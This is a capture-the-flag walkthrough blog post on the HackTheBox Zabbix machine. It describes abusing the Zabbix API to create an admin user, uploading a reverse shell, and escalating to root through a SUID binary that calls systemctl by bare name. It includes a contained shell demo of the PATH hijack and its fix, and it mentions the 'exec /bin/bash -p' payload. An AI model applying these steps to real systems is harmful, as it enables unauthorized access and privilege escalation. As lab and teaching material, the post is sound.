When a machine on HackTheBox is retired, it stays on the free server for a while before it becomes unavailable. This is awesome for me because it means I can complete another CTF video and blog post!
I recall this one took me quite a while to pop, mainly because the GUI was hard to navigate and I did not really understand what it was for. After some reading I now know: the Zabbix administrator panel is a monitoring tool for networks and infrastructure. A central Zabbix server collects data from agents installed on the monitored machines.
Interestingly, I could log in with the guest account and browse around. I found a script on GitHub that creates a user by connecting to the Zabbix API, which was really handy because the user it created had Super Administrator access.
Going through the administration console, I found a section where I was able to upload a reverse shell. Browsing the files, I could see that my permissions did not allow me to read user.txt. Running cat on backup.sh revealed a password for zapper, which let me in as that user.
Priv esc was through SUID permissions on zabbix-service. We could see that zabbix-service calls systemctl to start and stop the Zabbix daemon, and it does so by bare name rather than by absolute path. To take advantage of this, I created my own systemctl that spawns a bash shell, made it executable, and, most importantly, prepended my current directory to $PATH. The next time ./zabbix-service runs, the first systemctl it finds on the path I gave it is mine, so my binary executes with the SUID binary's privileges.
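The PATH hijack above, reproduced as an added example that is not code from the original post or from the HTB machine. Everything in it is a constructed stand-in: a plain script named zabbix-service plays the role of the SUID binary (it is not setuid here), a fake systemctl writes a proof file instead of spawning a shell, and a second function shows that the same attack fails once the service calls systemctl by absolute path. The file names and the PROOF variable are assumptions of the demo.

```shell
#!/bin/sh
# Added example, not from the original post. All scripts below are constructed
# stand-ins written into a temporary directory; nothing on the host is modified.

demo_path_hijack() {
  work=$(mktemp -d) || return 1

  # Stand-in for the vulnerable SUID binary: systemctl is called by bare
  # name, so whichever "systemctl" appears first on PATH is executed.
  cat > "$work/zabbix-service" <<'EOF'
#!/bin/sh
systemctl start zabbix-server
EOF

  # The attacker's systemctl, placed in the attacker's working directory.
  # On the real box this would be: exec /bin/bash -p
  cat > "$work/systemctl" <<'EOF'
#!/bin/sh
echo "hijacked by uid $(id -u) with args: $*" > "$PROOF"
EOF
  chmod +x "$work/zabbix-service" "$work/systemctl"

  # The hijack itself: cd into the directory holding the fake systemctl,
  # prepend it to PATH, then run the "SUID" binary as the post describes.
  (cd "$work" && export PROOF="$work/proof" && export PATH="$(pwd):$PATH" && ./zabbix-service)

  if [ -f "$work/proof" ]; then cat "$work/proof"; rc=0; else echo "not hijacked"; rc=1; fi
  rm -rf "$work"
  return "$rc"
}

# Same scenario, but the service calls systemctl by absolute path. A
# constructed "real" systemctl lives in $work/bin so the host's systemctl is
# never touched; the attacker's copy on PATH is simply never consulted.
demo_fixed_service() {
  work=$(mktemp -d) || return 1
  mkdir -p "$work/bin"

  cat > "$work/bin/systemctl" <<'EOF'
#!/bin/sh
echo "real systemctl called with: $*" >/dev/null
EOF

  # Hardened stand-in: full path baked in, so PATH no longer matters.
  printf '#!/bin/sh\n%s/bin/systemctl start zabbix-server\n' "$work" > "$work/zabbix-service"

  cat > "$work/systemctl" <<'EOF'
#!/bin/sh
echo "hijacked by uid $(id -u) with args: $*" > "$PROOF"
EOF
  chmod +x "$work/bin/systemctl" "$work/zabbix-service" "$work/systemctl"

  (cd "$work" && export PROOF="$work/proof" && export PATH="$(pwd):$PATH" && ./zabbix-service)

  if [ -f "$work/proof" ]; then cat "$work/proof"; rc=1; else echo "not hijacked"; rc=0; fi
  rm -rf "$work"
  return "$rc"
}

demo_path_hijack      # prints "hijacked by uid ..." because PATH was searched
demo_fixed_service    # prints "not hijacked" because the path was absolute
```

Two practical notes. First, on the real box the fake systemctl should run `exec /bin/bash -p`: without `-p`, bash resets its effective UID to the real UID on startup and the root privileges gained through the SUID binary are thrown away. Second, the fix for the binary is exactly what the second function shows: call helpers by absolute path (or set PATH explicitly before calling them), and never rely on the caller's environment from a setuid program.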
Hope you enjoy the video.
Click here to view my walkthrough